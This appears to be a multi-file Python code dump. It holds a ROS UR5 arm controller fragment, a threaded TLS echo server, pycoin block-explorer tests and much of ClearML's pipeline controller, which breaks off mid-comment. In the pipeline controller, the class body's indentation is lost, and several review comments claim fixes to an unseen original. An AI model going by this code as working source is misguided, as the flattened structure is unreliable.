                 "Shipped Date and Time": ship_instant.strftime("%Y-%m-%d %H:%M:%S"),
                 "Estimated Time of Delivery": (ship_instant + ship_time).strftime("%d-%m-%Y")}
        # Updating Spreadsheet
        ACTION_CLIENT.send_goal_pls(order)
        # Travel to home
        UR5.moveit_play_planned_path_from_file(UR5.file_path + 'ur5_2/',
                                               '%s_to_home.yaml' % bin_name[0])

    def controller(self):
        """
        Executes the main operations, coordinating the UR5_2.
        """
        # Go to home position
        UR5.moveit_play_planned_path_from_file(UR5.file_path + 'ur5_2/', 'zero_to_home.yaml')
        # Execute planning
        while not rospy.is_shutdown():
            try:
                if ('packagen' in self.package_name) and self.ready_flag:  # When box detected
                    box_plan(self.package_name, ENV_VALUES[0], ENV_VALUES[1])
                    self.bin_plan()  # Execute place operation
                    self.package_colours.pop(0)  # Removing item from list
                    self.ready_flag = False  # Signalling conveyor
                # Yield the CPU while waiting for the next package (the
                # original loop busy-spun between detections)
                rospy.sleep(0.01)
            except ROSInterruptException:
                quit()
if __name__ == '__main__':
    # Initial delay — presumably to let Gazebo / the ROS graph come up
    # before initialising MoveIt; TODO confirm the required duration.
    rospy.sleep(10)
    UR5 = Ur5Moveit("ur5_2")  # Initialise the UR5_2
    ACTION_CLIENT = RosIotBridgeActionClient()  # Start the ROS-IoT Bridge
    UR5_2 = UR5Two()
    # Start the separate conveyor control thread
    T = threading.Thread(target=UR5_2.smart_stop)
    T.start()
    # Obtain prerequisite data (box length, gripper width, home joint angles)
    ENV_VALUES = env_data()
    # Start execution
    UR5_2.controller()
|
threadsslecho.py | # Copied from https://github.com/dabeaz/curio/blob/master/examples/bench/threadecho.py
# A simple echo server with threads
from socket import *
from threading import Thread
import ssl
import os
path = os.path.dirname(os.path.abspath(__file__))
KEYFILE = os.path.join(path, "ssl_test_rsa") # Private key
CERTFILE = os.path.join(path, "ssl_test.crt") # Certificate (self-signed)
def echo_server(addr):
    """Accept TCP connections on *addr* and spawn one handler thread per client."""
    listener = socket(AF_INET, SOCK_STREAM)
    # Allow quick restarts without waiting out TIME_WAIT
    listener.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
    listener.bind(addr)
    listener.listen(5)
    while True:
        conn, peer = listener.accept()
        worker = Thread(target=echo_handler, args=(conn, peer), daemon=True)
        worker.start()
def echo_handler(client, addr):
    """Wrap *client* in server-side TLS, then echo every received chunk until EOF."""
    print('Connection from', addr)
    # Disable Nagle so small echoes are not delayed
    client.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
    ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
    ctx.load_cert_chain(certfile=CERTFILE, keyfile=KEYFILE)
    tls_conn = ctx.wrap_socket(client, server_side=True)
    with tls_conn:
        while True:
            chunk = tls_conn.recv(100000)
            if not chunk:
                break
            tls_conn.sendall(chunk)
    print('Connection closed')
if __name__ == '__main__':
    # Listen on all interfaces, TCP port 25000.
    echo_server(('', 25000))
|
services_test.py |
import threading
import unittest
from pycoin.encoding.hexbytes import h2b_rev
from pycoin.services import providers
from pycoin.services.blockchain_info import BlockchainInfoProvider
from pycoin.services.blockcypher import BlockcypherProvider
from pycoin.services.blockexplorer import BlockExplorerProvider
from pycoin.services.chain_so import ChainSoProvider
from pycoin.services.insight import InsightProvider
BLOCK_0_HASH = h2b_rev("000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f")
BLOCK_1_HASH = h2b_rev("00000000839a8e6886ab5951d76f411475428afc90947ee320161bbf18eb6048")
tx_id_for_net = {
"BTC": ["b958e4a3ccd5bc8fe0ff6fafd635199313e347b88a8102040c05dd123f32a4f3",
"d1ef46055a84fd02ee82580d691064780def18614d98646371c3448ca20019ac",
"69916297f7adde13457b8244e2d704966097e9519ec8fd6f2e7af8c2a60f70f2",
"c586389e5e4b3acb9d6c8be1c19ae8ab2795397633176f5a6442a261bbdefc3a"],
"XTN": ["4586e67ee5adcdbc97ed3d2a026ee8703df2ed3553854c186c216e90cd761b69"],
"DOGE": ["ed7df4e7506ac8447b6983c8ad79da1af86cddda0ff012f7db83e664f61ef6cf"],
"XDT": ["19dd5c3423e606b5b5dd30b070688bdf9af27fa736e8f3aeb2b68d92a50e67ef"],
}
class ServicesTest(unittest.TestCase):
    """Integration tests for the pycoin block-explorer service providers.

    NOTE(review): most of these tests hit live third-party web services, so
    they require network access and can fail for reasons unrelated to the
    code under test.
    """

    def test_env(self):
        # One provider instance is expected per whitespace-separated entry.
        CS = "blockchain.info blockexplorer.com chain.so insight:https://hostname/url"
        provider_list = providers.providers_for_config_string(CS, "BTC")
        self.assertEqual(len(provider_list), len(CS.split()))

    def test_thread_provider(self):
        # Default providers are stored per-thread: changes made in a child
        # thread must not leak into the main thread's configuration.
        p_list_1 = providers.providers_for_config_string("blockchain.info", "BTC")
        p_list_2 = providers.providers_for_config_string("blockexplorer.com", "BTC")
        providers.set_default_providers_for_netcode("BTC", p_list_1)
        self.assertEqual(providers.get_default_providers_for_netcode("BTC"), p_list_1)
        # use a dictionary so it can be mutable in the subthread
        d = {"is_ok": False}

        def subthread():
            providers.set_default_providers_for_netcode("BTC", [])
            self.assertEqual(providers.get_default_providers_for_netcode("BTC"), [])
            providers.set_default_providers_for_netcode("BTC", p_list_2)
            self.assertEqual(providers.get_default_providers_for_netcode("BTC"), p_list_2)
            d["is_ok"] = True

        t = threading.Thread(target=subthread)
        t.start()
        t.join()
        self.assertTrue(d["is_ok"])
        # The main thread's provider list must be untouched by the subthread.
        self.assertEqual(providers.get_default_providers_for_netcode("BTC"), p_list_1)

    def check_provider_tx_for_tx_hash(self, p, networks):
        # Shared helper: fetch each known tx id through provider factory `p`
        # and verify the returned transaction hashes back to the requested id.
        for net in networks:
            b = p(net)
            for tx_id in tx_id_for_net[net]:
                tx = b.tx_for_tx_hash(h2b_rev(tx_id))
                self.assertEqual(tx.id(), tx_id)

    def test_BitcoindProvider(self):
        # not sure what to do here, as there is no open bitcoind provider I know of
        pass

    def test_BlockchainInfo(self):
        self.check_provider_tx_for_tx_hash(BlockchainInfoProvider, ["BTC"])

    @unittest.skip("this test is not working for some reason")
    def test_BlockCypherProvider(self):
        self.check_provider_tx_for_tx_hash(BlockcypherProvider, ["BTC", "XTN"])

    @unittest.skip("this test is not working for some reason")
    def test_BlockExplorerProvider(self):
        self.check_provider_tx_for_tx_hash(BlockExplorerProvider, ["BTC"])

    @unittest.skip("this test is causing problems in travis-ci because chain_so thinks it's a DOS attack")
    def test_ChainSoProvider(self):
        self.check_provider_tx_for_tx_hash(ChainSoProvider, ["BTC", "XTN", "DOGE", "XDT"])

    def test_InsightProvider(self):
        provider = InsightProvider("http://insight.bitpay.com/api/")
        self.check_provider_tx_for_tx_hash(lambda x: provider, ["BTC"])
        provider.get_blockchain_tip()
        # Block 1 must link back to the genesis block.
        # NOTE(review): these are plain asserts (not self.assert*) — they are
        # stripped under `python -O`; confirm this is intentional.
        h = provider.get_blockheader(BLOCK_1_HASH)
        assert h.previous_block_hash == BLOCK_0_HASH
        height = provider.get_block_height(BLOCK_1_HASH)
        assert height == 1
def main():
    """Run this module's test suite via the unittest CLI runner."""
    unittest.main()
if __name__ == "__main__":
    # Script entry point.
    main()
|
controller.py | import re
from copy import copy
from datetime import datetime
from logging import getLogger
from threading import Thread, Event, RLock
from time import time
from attr import attrib, attrs
from typing import Sequence, Optional, Mapping, Callable, Any, Union, List
from ..backend_interface.util import get_or_create_project
from ..debugging.log import LoggerRoot
from ..task import Task
from ..automation import ClearmlJob
from ..model import BaseModel
from ..utilities.process.mp import leave_process
class PipelineController(object):
"""
Pipeline controller.
Pipeline is a DAG of base tasks, each task will be cloned (arguments changed as required) executed and monitored
The pipeline process (task) itself can be executed manually or by the clearml-agent services queue.
Notice: The pipeline controller lives as long as the pipeline itself is being executed.
"""
_tag = 'pipeline'
_step_pattern = r"\${[^}]*}"
_config_section = 'Pipeline'
_task_project_lookup = {}
@attrs
class Node(object):
    # One pipeline step (DAG node) and its runtime state.
    name = attrib(type=str)  # unique step name within the pipeline
    base_task_id = attrib(type=str)  # Task id to clone / execute
    queue = attrib(type=str, default=None)  # per-step execution queue override
    # NOTE: mutable containers use `factory=` so every Node gets its own
    # fresh instance. The original `default=[]` / `default={}` created ONE
    # shared list/dict at class-definition time, so a mutation on one node
    # (e.g. node.parents.append(...)) silently leaked into every other node.
    parents = attrib(type=list, factory=list)  # names of parent steps
    timeout = attrib(type=float, default=None)  # step time limit (seconds)
    parameters = attrib(type=dict, factory=dict)  # parameter overrides
    task_overrides = attrib(type=dict, factory=dict)  # task-section overrides
    executed = attrib(type=str, default=None)  # executed Task id (or None)
    clone_task = attrib(type=bool, default=True)  # clone base task before run
    job = attrib(type=ClearmlJob, default=None)  # runtime job object
    skip_job = attrib(type=bool, default=False)  # step vetoed by callback
    cache_executed_step = attrib(type=bool, default=False)  # reuse identical run
def __init__(
        self,
        pool_frequency=0.2,  # type: float
        default_execution_queue=None,  # type: Optional[str]
        pipeline_time_limit=None,  # type: Optional[float]
        auto_connect_task=True,  # type: Union[bool, Task]
        always_create_task=False,  # type: bool
        add_pipeline_tags=False,  # type: bool
        target_project=None,  # type: Optional[str]
        pipeline_name=None,  # type: Optional[str]
        pipeline_project=None,  # type: Optional[str]
):
    # type: (...) -> ()
    """
    Create a new pipeline controller. The newly created object will launch and monitor the new experiments.
    :param float pool_frequency: The pooling frequency (in minutes) for monitoring experiments / states.
    :param str default_execution_queue: The execution queue to use if no execution queue is provided
    :param float pipeline_time_limit: The maximum time (minutes) for the entire pipeline process. The
        default is ``None``, indicating no time limit.
    :param bool auto_connect_task: Store pipeline arguments and configuration in the Task
        - ``True`` - The pipeline argument and configuration will be stored in the current Task. All arguments will
          be under the hyper-parameter section ``Pipeline``, and the pipeline DAG will be stored as a
          Task configuration object named ``Pipeline``.
          Notice that when running remotely the DAG definitions will be taken from the Task itself (e.g. editing
          the configuration in the UI will be reflected in the actual DAG created).
        - ``False`` - Do not store DAG configuration on the Task.
          In remote execution the DAG will always be created from code.
        - ``Task`` - A specific Task object to connect the pipeline with.
    :param bool always_create_task: Always create a new Task
        - ``True`` - No current Task initialized. Create a new task named ``Pipeline`` in the ``base_task_id``
          project.
        - ``False`` - Use the :py:meth:`task.Task.current_task` (if exists) to report statistics.
    :param bool add_pipeline_tags: (default: False) if True, add `pipe: <pipeline_task_id>` tag to all
        steps (Tasks) created by this pipeline.
    :param str target_project: If provided, all pipeline steps are cloned into the target project
    :param pipeline_name: Optional, provide pipeline name if main Task is not present (default current date)
    :param pipeline_project: Optional, provide project storing the pipeline if main Task is not present
    """
    self._nodes = {}  # step name -> PipelineController.Node
    self._running_nodes = []  # names of steps currently executing
    self._start_time = None  # set by start(); used by elapsed()
    # Caller-facing units are minutes; internally stored as seconds
    self._pipeline_time_limit = pipeline_time_limit * 60. if pipeline_time_limit else None
    self._default_execution_queue = default_execution_queue
    self._pool_frequency = pool_frequency * 60.
    self._thread = None  # monitoring daemon thread (created in start())
    self._stop_event = None
    self._experiment_created_cb = None
    self._experiment_completed_cb = None
    self._pre_step_callbacks = {}  # step name -> pre-execute callback
    self._post_step_callbacks = {}  # step name -> post-execute callback
    self._target_project = target_project or ''
    self._add_pipeline_tags = add_pipeline_tags
    # Use an explicitly passed Task, otherwise fall back to the current Task
    self._task = auto_connect_task if isinstance(auto_connect_task, Task) else Task.current_task()
    self._step_ref_pattern = re.compile(self._step_pattern)
    self._reporting_lock = RLock()  # serializes execution-plot reporting
    self._pipeline_task_status_failed = None
    if not self._task and always_create_task:
        self._task = Task.init(
            project_name=pipeline_project or 'Pipelines',
            task_name=pipeline_name or 'Pipeline {}'.format(datetime.now()),
            task_type=Task.TaskTypes.controller,
        )
    self._auto_connect_task = bool(auto_connect_task) and bool(self._task)
    # make sure we add to the main Task the pipeline tag
    if self._task:
        self._task.add_tags([self._tag])
def add_step(
        self,
        name,  # type: str
        base_task_id=None,  # type: Optional[str]
        parents=None,  # type: Optional[Sequence[str]]
        parameter_override=None,  # type: Optional[Mapping[str, Any]]
        task_overrides=None,  # type: Optional[Mapping[str, Any]]
        execution_queue=None,  # type: Optional[str]
        time_limit=None,  # type: Optional[float]
        base_task_project=None,  # type: Optional[str]
        base_task_name=None,  # type: Optional[str]
        clone_base_task=True,  # type: bool
        pre_execute_callback=None,  # type: Optional[Callable[[PipelineController, PipelineController.Node, dict], bool]]  # noqa
        post_execute_callback=None,  # type: Optional[Callable[[PipelineController, PipelineController.Node], None]]  # noqa
        cache_executed_step=False,  # type: bool
):
    # type: (...) -> bool
    """
    Add a step to the pipeline execution DAG.
    Each step must have a unique name (this name will later be used to address the step)
    :param str name: Unique of the step. For example `stage1`
    :param str base_task_id: The Task ID to use for the step. Each time the step is executed,
        the base Task is cloned, then the cloned task will be sent for execution.
    :param list parents: Optional list of parent nodes in the DAG.
        The current step in the pipeline will be sent for execution only after all the parent nodes
        have been executed successfully.
    :param dict parameter_override: Optional parameter overriding dictionary.
        The dict values can reference a previously executed step using the following form '${step_name}'
        Examples:
        - Artifact access
            parameter_override={'Args/input_file': '${stage1.artifacts.mydata.url}' }
        - Model access (last model used)
            parameter_override={'Args/input_file': '${stage1.models.output.-1.url}' }
        - Parameter access
            parameter_override={'Args/input_file': '${stage3.parameters.Args/input_file}' }
        - Task ID
            parameter_override={'Args/input_file': '${stage3.id}' }
    :param dict task_overrides: Optional task section overriding dictionary.
        The dict values can reference a previously executed step using the following form '${step_name}'
        Examples:
        - clear git repository commit ID
            parameter_override={'script.version_num': '' }
        - git repository commit branch
            parameter_override={'script.branch': '${stage1.script.branch}' }
        - container image
            parameter_override={'container.image': '${stage1.container.image}' }
    :param str execution_queue: Optional, the queue to use for executing this specific step.
        If not provided, the task will be sent to the default execution queue, as defined on the class
    :param float time_limit: Default None, no time limit.
        Step execution time limit, if exceeded the Task is aborted and the pipeline is stopped and marked failed.
    :param str base_task_project: If base_task_id is not given,
        use the base_task_project and base_task_name combination to retrieve the base_task_id to use for the step.
    :param str base_task_name: If base_task_id is not given,
        use the base_task_project and base_task_name combination to retrieve the base_task_id to use for the step.
    :param bool clone_base_task: If True (default) the pipeline will clone the base task, and modify/enqueue
        the cloned Task. If False, the base-task is used directly, notice it has to be in draft-mode (created).
    :param Callable pre_execute_callback: Callback function, called when the step (Task) is created
        and before it is sent for execution. Allows a user to modify the Task before launch.
        Use `node.job` to access the ClearmlJob object, or `node.job.task` to directly access the Task object.
        `parameters` are the configuration arguments passed to the ClearmlJob.
        If the callback returned value is `False`,
        the Node is skipped and so is any node in the DAG that relies on this node.
        Notice the `parameters` are already parsed,
        e.g. `${step1.parameters.Args/param}` is replaced with relevant value.
        .. code-block:: py
            def step_created_callback(
                pipeline,  # type: PipelineController,
                node,  # type: PipelineController.Node,
                parameters,  # type: dict
            ):
                pass
    :param Callable post_execute_callback: Callback function, called when a step (Task) is completed
        and it other jobs are executed. Allows a user to modify the Task status after completion.
        .. code-block:: py
            def step_completed_callback(
                pipeline,  # type: PipelineController,
                node,  # type: PipelineController.Node,
            ):
                pass
    :param cache_executed_step: If True, before launching the new step,
        after updating with the latest configuration, check if an exact Task with the same parameter/code
        was already executed. If it was found, use it instead of launching a new Task.
        Default: False, a new cloned copy of base_task is always used.
        Notice: If the git repo reference does not have a specific commit ID, the Task will never be used.
        If `clone_base_task` is False there is no cloning, hence the base_task is used.
    :return: True if successful
    """
    # always store callback functions (even when running remotely)
    if pre_execute_callback:
        self._pre_step_callbacks[name] = pre_execute_callback
    if post_execute_callback:
        self._post_step_callbacks[name] = post_execute_callback
    # when running remotely do nothing, we will deserialize ourselves when we start
    # if we are not cloning a Task, we assume this step is created from code, not from the configuration
    if clone_base_task and self._has_stored_configuration():
        return True
    if name in self._nodes:
        raise ValueError('Node named \'{}\' already exists in the pipeline dag'.format(name))
    if not base_task_id:
        if not base_task_project or not base_task_name:
            raise ValueError('Either base_task_id or base_task_project/base_task_name must be provided')
        # Resolve the base Task by project/name; accept any non-failed status
        base_task = Task.get_task(
            project_name=base_task_project,
            task_name=base_task_name,
            allow_archived=True,
            task_filter=dict(
                status=[str(Task.TaskStatusEnum.created), str(Task.TaskStatusEnum.queued),
                        str(Task.TaskStatusEnum.in_progress), str(Task.TaskStatusEnum.published),
                        str(Task.TaskStatusEnum.stopped), str(Task.TaskStatusEnum.completed),
                        str(Task.TaskStatusEnum.closed)],
            )
        )
        if not base_task:
            raise ValueError('Could not find base_task_project={} base_task_name={}'.format(
                base_task_project, base_task_name))
        # Archived tasks are usable but probably unintended — warn, don't fail
        if Task.archived_tag in base_task.get_system_tags():
            LoggerRoot.get_base_logger().warning(
                'Found base_task_project={} base_task_name={} but it is archived'.format(
                    base_task_project, base_task_name))
        base_task_id = base_task.id
    self._nodes[name] = self.Node(
        name=name, base_task_id=base_task_id, parents=parents or [],
        queue=execution_queue, timeout=time_limit,
        parameters=parameter_override or {},
        clone_task=clone_base_task,
        task_overrides=task_overrides,
        cache_executed_step=cache_executed_step,
    )
    # When running remotely, reflect the updated DAG on the Task immediately
    if self._task and not self._task.running_locally():
        self.update_execution_plot()
    return True
def start(
        self,
        step_task_created_callback=None,  # type: Optional[Callable[[PipelineController, PipelineController.Node, dict], bool]]  # noqa
        step_task_completed_callback=None  # type: Optional[Callable[[PipelineController, PipelineController.Node], None]]  # noqa
):
    # type: (...) -> bool
    """
    Start the pipeline controller.
    If the calling process is stopped, then the controller stops as well.
    :param Callable step_task_created_callback: Callback function, called when a step (Task) is created
        and before it is sent for execution. Allows a user to modify the Task before launch.
        Use `node.job` to access the ClearmlJob object, or `node.job.task` to directly access the Task object.
        `parameters` are the configuration arguments passed to the ClearmlJob.
        If the callback returned value is `False`,
        the Node is skipped and so is any node in the DAG that relies on this node.
        Notice the `parameters` are already parsed,
        e.g. `${step1.parameters.Args/param}` is replaced with relevant value.
        .. code-block:: py
            def step_created_callback(
                pipeline,  # type: PipelineController,
                node,  # type: PipelineController.Node,
                parameters,  # type: dict
            ):
                pass
    :param Callable step_task_completed_callback: Callback function, called when a step (Task) is completed
        and it other jobs are executed. Allows a user to modify the Task status after completion.
        .. code-block:: py
            def step_completed_callback(
                pipeline,  # type: PipelineController,
                node,  # type: PipelineController.Node,
            ):
                pass
    :return: True, if the controller started. False, if the controller did not start.
    """
    # Idempotent: already started
    if self._thread:
        return True
    params, pipeline_dag = self._serialize_pipeline_task()
    # deserialize back pipeline state
    if not params['continue_pipeline']:
        # Fresh run: clear any stale 'executed' markers from the stored DAG
        for k in pipeline_dag:
            pipeline_dag[k]['executed'] = None
    self._default_execution_queue = params['default_queue']
    self._add_pipeline_tags = params['add_pipeline_tags']
    self._target_project = params['target_project'] or ''
    self._deserialize(pipeline_dag)
    # if we continue the pipeline, make sure that we re-execute failed tasks
    if params['continue_pipeline']:
        for node in self._nodes.values():
            if node.executed is False:
                node.executed = None
    if not self._verify():
        raise ValueError("Failed verifying pipeline execution graph, "
                         "it has either inaccessible nodes, or contains cycles")
    self.update_execution_plot()
    self._start_time = time()
    self._stop_event = Event()
    self._experiment_created_cb = step_task_created_callback
    self._experiment_completed_cb = step_task_completed_callback
    # The monitoring loop runs in a daemon thread so it dies with the process
    self._thread = Thread(target=self._daemon)
    self._thread.daemon = True
    self._thread.start()
    return True
def start_remotely(self, queue='services', exit_process=True):
    # type: (str, bool) -> Task
    """
    Start the current pipeline remotely (on the selected services queue)
    The current process will be stopped if exit_process is True.
    :param queue: queue name to launch the pipeline on
    :param exit_process: If True exit the current process after launching on the enqueuing on the queue
    :return: The remote Task object
    """
    if not self._task:
        raise ValueError(
            "Could not find main Task, "
            "PipelineController must be created with `always_create_task=True`")
    # Local side: snapshot the DAG/params onto the Task before enqueuing
    if Task.running_locally() or not self._task.is_main_task():
        self._serialize_pipeline_task()
        self.update_execution_plot()
    # Enqueue for the agent (no-op when we are already the remote execution)
    self._task.execute_remotely(queue_name=queue, exit_process=exit_process, clone=False)
    # Local side (or non-main task): hand back the Task object
    if Task.running_locally() or not self._task.is_main_task():
        return self._task
    # Remote side: actually run the pipeline to completion, then exit
    self.start()
    self.wait()
    self.stop()
    leave_process(0)
def stop(self, timeout=None):
    # type: (Optional[float]) -> ()
    """
    Stop the pipeline controller and the optimization thread.
    :param float timeout: Wait timeout for the optimization thread to exit (minutes).
        The default is ``None``, indicating do not wait terminate immediately.
    """
    self.wait(timeout=timeout)
    # Nothing to report unless a step failed and we own a Task
    if not (self._task and self._pipeline_task_status_failed):
        return
    print('Setting pipeline controller Task as failed (due to failed steps) !')
    self._task.close()
    self._task.mark_failed(status_reason='Pipeline step failed', force=True)
def wait(self, timeout=None):
    # type: (Optional[float]) -> bool
    """
    Wait for the pipeline to finish.
    .. note::
        This method does not stop the pipeline. Call :meth:`stop` to terminate the pipeline.
    :param float timeout: The timeout to wait for the pipeline to complete (minutes).
        If ``None``, then wait until we reached the timeout, or pipeline completed.
    :return: True, if the pipeline finished. False, if the pipeline timed out.
    """
    if not self.is_running():
        return True
    worker = self._thread
    # Public API is in minutes; Thread.join() takes seconds
    worker.join(timeout=None if timeout is None else timeout * 60.)
    return not worker.is_alive()
def is_running(self):
    # type: () -> bool
    """
    return True if the pipeline controller is running.
    :return: A boolean indicating whether the pipeline controller is active (still running) or stopped.
    """
    monitor = self._thread
    return monitor is not None and monitor.is_alive()
def is_successful(self):
    # type: () -> bool
    """
    Return True if the pipeline controller finished executing and none of the steps / Tasks failed.
    :return: A boolean indicating whether all steps did not fail
    """
    # bool() guards the first term: the original expression returned the
    # Thread object itself (or None) instead of a boolean when the first
    # operand short-circuited, violating the declared -> bool contract.
    return bool(self._thread) and not self.is_running() and not self._pipeline_task_status_failed
def elapsed(self):
    # type: () -> float
    """
    Return minutes elapsed from controller stating time stamp.
    :return: The minutes from controller start time. A negative value means the process has not started yet.
    """
    started = self._start_time
    # Sentinel -1.0 means start() has not been called yet
    return -1.0 if started is None else (time() - started) / 60.
def get_pipeline_dag(self):
    # type: () -> Mapping[str, PipelineController.Node]
    """
    Return the pipeline execution graph, each node in the DAG is PipelineController.Node object.
    Graph itself is a dictionary of Nodes (key based on the Node name),
    each node holds links to its parent Nodes (identified by their unique names)
    :return: execution tree, as a nested dictionary. Example:
    .. code-block:: py
        {
            'stage1' : Node() {
                name: 'stage1'
                job: ClearmlJob
                ...
            },
        }
    """
    # NOTE: returns the live internal dict, not a copy — callers mutate at their own risk.
    return self._nodes
def get_processed_nodes(self):
    # type: () -> Mapping[str, PipelineController.Node]
    """
    Return the processed pipeline nodes keyed by node name.
    NOTE(review): despite the historical "list" wording and the previous
    Sequence annotation, this returns a dict (name -> Node).
    :return: executed (excluding currently executing) nodes mapping
    """
    return {k: n for k, n in self._nodes.items() if n.executed}
def get_running_nodes(self):
    # type: () -> Mapping[str, PipelineController.Node]
    """
    Return the currently running pipeline nodes keyed by node name.
    NOTE(review): despite the historical "list" wording and the previous
    Sequence annotation, this returns a dict (name -> Node).
    :return: Currently running nodes mapping
    """
    return {k: n for k, n in self._nodes.items() if k in self._running_nodes}
def update_execution_plot(self):
    # type: () -> ()
    """
    Update sankey diagram of the current pipeline
    """
    # Serialize reporting: the monitor thread and user calls may race here
    with self._reporting_lock:
        self._update_execution_plot()
def _serialize_pipeline_task(self):
    # type: () -> (dict, dict)
    """
    Serialize current pipeline state into the main Task
    :return: params, pipeline_dag
    """
    # Run-level parameters stored under the 'Pipeline' hyper-parameter section
    params = {'continue_pipeline': False,
              'default_queue': self._default_execution_queue,
              'add_pipeline_tags': self._add_pipeline_tags,
              'target_project': self._target_project,
              }
    pipeline_dag = self._serialize()
    # serialize pipeline state
    # When connected, the Task copy becomes authoritative on remote execution
    # (connect() may also overwrite params/dag with values stored on the Task)
    if self._task and self._auto_connect_task:
        self._task.connect_configuration(pipeline_dag, name=self._config_section)
        self._task.connect(params, name=self._config_section)
    return params, pipeline_dag
def _serialize(self):
    # type: () -> dict
    """
    Store the definition of the pipeline DAG into a dictionary.
    This dictionary will be used to store the DAG as a configuration on the Task
    :return:
    """
    # 'job' (runtime object) and 'name' (redundant with the key) are not persisted
    excluded = ('job', 'name')
    return {
        step_name: {field: value
                    for field, value in node.__dict__.items()
                    if field not in excluded}
        for step_name, node in self._nodes.items()
    }
def _deserialize(self, dag_dict):
    # type: (dict) -> ()
    """
    Restore the DAG from a dictionary.
    This will be used to create the DAG from the dict stored on the Task, when running remotely.
    :param dict dag_dict: serialized DAG (step name -> node fields), as produced by _serialize()
    :return:
    """
    # make sure that we override nodes that we do not clone.
    # BUG FIX: the original indexed `dag_dict['name']` with the literal string
    # 'name' instead of the loop variable, so the code-defined node state was
    # never written back for the matching step and a bogus 'name' entry could
    # be injected into the restored DAG.
    for name in self._nodes:
        if self._nodes[name].clone_task and name in dag_dict and dag_dict[name].get('clone_task'):
            dag_dict[name] = dict(
                (k, v) for k, v in self._nodes[name].__dict__.items() if k not in ('job', 'name'))
    # Prefer the existing in-memory Node for non-cloned steps defined in code;
    # otherwise rebuild each Node from its serialized fields.
    self._nodes = {
        k: self.Node(name=k, **v) if not v.get('clone_task') or k not in self._nodes else self._nodes[k]
        for k, v in dag_dict.items()}
def _has_stored_configuration(self):
    """
    Return True if we are running remotely and we have stored configuration on the Task
    """
    remote_main = (
        self._auto_connect_task
        and self._task
        and not self._task.running_locally()
        and self._task.is_main_task()
    )
    if not remote_main:
        return False
    return bool(self._task.get_configuration_object(self._config_section))
def _verify(self):
    # type: () -> bool
    """
    Verify the DAG, (i.e. no cycles and no missing parents)
    On error raise ValueError with verification details
    :return: return True iff DAG has no errors
    """
    # Per-node checks raise ValueError on the first invalid node
    for node in self._nodes.values():
        self._verify_node(node)
    # Then validate the graph as a whole (reachability / cycles)
    return self._verify_dag()
def _verify_node(self, node):
    # type: (PipelineController.Node) -> bool
    """
    Raise ValueError on verification errors
    :return: Return True iff the specific node is verified
    """
    if not node.base_task_id:
        raise ValueError("Node '{}', base_task_id is empty".format(node.name))
    # A step must resolve to SOME queue: its own or the controller default
    if not self._default_execution_queue and not node.queue:
        raise ValueError("Node '{}' missing execution queue, "
                         "no default queue defined and no specific node queue defined".format(node.name))
    # Confirm the referenced base Task actually exists on the server
    task = Task.get_task(task_id=node.base_task_id)
    if not task:
        raise ValueError("Node '{}', base_task_id={} is invalid".format(node.name, node.base_task_id))
    # Validate every '${step.*}' reference embedded in the parameter values
    pattern = self._step_ref_pattern
    for v in node.parameters.values():
        if isinstance(v, str):
            for g in pattern.findall(v):
                self.__verify_step_reference(node, g)
    return True
def _verify_dag(self):
    # type: () -> bool
    """
    :return: True iff the pipeline dag is fully accessible and contains no cycles
    """
    # Topological sweep: repeatedly mark every node whose parents are all
    # already marked. A cycle or a reference to a missing parent leaves
    # some nodes permanently unmarked.
    reachable = set()
    progress = True
    while progress:
        progress = False
        for step_name, node in self._nodes.items():
            if step_name in reachable:
                continue
            if all(parent in reachable for parent in node.parents or []):
                reachable.add(step_name)
                progress = True
    return len(reachable) == len(self._nodes)
def _launch_node(self, node):
    # type: (PipelineController.Node) -> ()
    """
    Launch a single node (create and enqueue a ClearmlJob)

    :param node: Node to launch
    :return: Return True if a new job was launched
    """
    # already launched (job exists) or already finished on a previous run
    if node.job or node.executed:
        return False

    # resolve "${step.*}" references in the node's parameter overrides
    updated_hyper_parameters = {}
    for k, v in node.parameters.items():
        updated_hyper_parameters[k] = self._parse_step_ref(v)

    task_overrides = self._parse_task_overrides(node.task_overrides) if node.task_overrides else None

    extra_args = dict()
    if self._target_project:
        extra_args['project'] = get_or_create_project(
            session=self._task.session if self._task else Task.default_session,
            project_name=self._target_project)

    # pre-step callback may veto the node by returning False
    skip_node = None
    if self._pre_step_callbacks.get(node.name):
        skip_node = self._pre_step_callbacks[node.name](self, node, updated_hyper_parameters)

    if skip_node is False:
        # the node was skipped on purpose; still counts as "handled"
        node.skip_job = True
        return True

    node.job = ClearmlJob(
        base_task_id=node.base_task_id, parameter_override=updated_hyper_parameters,
        tags=['pipe: {}'.format(self._task.id)] if self._add_pipeline_tags and self._task else None,
        parent=self._task.id if self._task else None,
        disable_clone_task=not node.clone_task,
        task_overrides=task_overrides,
        allow_caching=node.cache_executed_step,
        **extra_args
    )
    # legacy "experiment created" callback may also veto after the Job exists
    if self._experiment_created_cb:
        skip_node = self._experiment_created_cb(self, node, updated_hyper_parameters)
    if skip_node is False:
        # skipping node
        getLogger('clearml.automation.controller').warning(
            'Skipping node {} on callback request'.format(node))
        # delete the job we just created
        node.job.delete()
        node.skip_job = True
    elif node.job.is_cached_task():
        # cached: reuse the previous task result, nothing to enqueue
        node.executed = node.job.task_id()
    else:
        node.job.launch(queue_name=node.queue or self._default_execution_queue)

    return True
def _update_execution_plot(self):
    # type: () -> ()
    """
    Update sankey diagram of the current pipeline.

    Walks the DAG in topological order (parents before children), builds the
    sankey node/link arrays and a per-node parameter list, renders unconnected
    nodes as a scatter overlay (sankey cannot show isolated nodes), and
    reports both the diagram and a detailed table to the controller Task.
    """
    if not self._task:
        return
    sankey_node = dict(
        label=[],
        color=[],
        hovertemplate='%{label}<extra></extra>',
        # customdata=[],
        # hovertemplate='%{label}<br />Hyper-Parameters:<br />%{customdata}<extra></extra>',
    )
    sankey_link = dict(
        source=[],
        target=[],
        value=[],
        # hovertemplate='%{target.label}<extra></extra>',
        hovertemplate='<extra></extra>',
    )
    visited = []
    node_params = []
    nodes = list(self._nodes.values())
    while nodes:
        next_nodes = []
        for node in nodes:
            # defer nodes whose parents were not visited yet (topological order)
            if not all(p in visited for p in node.parents or []):
                next_nodes.append(node)
                continue
            visited.append(node.name)
            idx = len(visited) - 1
            parents = [visited.index(p) for p in node.parents or []]
            # BUG FIX: the original wrote `node_params.append(...) or {}` which
